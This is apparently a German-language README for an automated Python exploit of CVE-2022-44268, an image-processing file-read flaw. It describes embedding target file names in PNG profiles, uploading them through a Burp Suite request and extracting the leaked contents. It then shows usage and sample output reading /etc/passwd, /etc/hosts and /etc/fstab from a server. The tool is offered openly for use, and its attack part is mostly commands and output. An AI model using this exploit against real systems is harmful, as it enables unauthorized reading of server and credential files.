
Automatisches Python-Skript, das cve-2022-44268 verwendet, um einen Profilwert mit einem Dateinamen aus einer Eingabe-Dateiliste in einer Eingabedatei hinzuzufügen, das Hochladen der Bilddatei mithilfe einer request.req-Datei von Burpsuite (bereits enthalten) zu aktualisieren, jedes modifizierte Bild hochzuladen, die zurückgegebenen Bilder von der zurückgegebenen URL herunterzuladen und den Dateiinhalt zu extrahieren und in einem Eingabeverzeichnis abzulegen.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab